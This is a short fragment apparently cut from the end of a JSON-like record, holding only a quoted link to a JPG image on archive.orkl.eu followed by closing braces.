"https://archive.orkl.eu/e0a0370a366efe41ef66ebed9b8885ece203bbd7.jpg" } }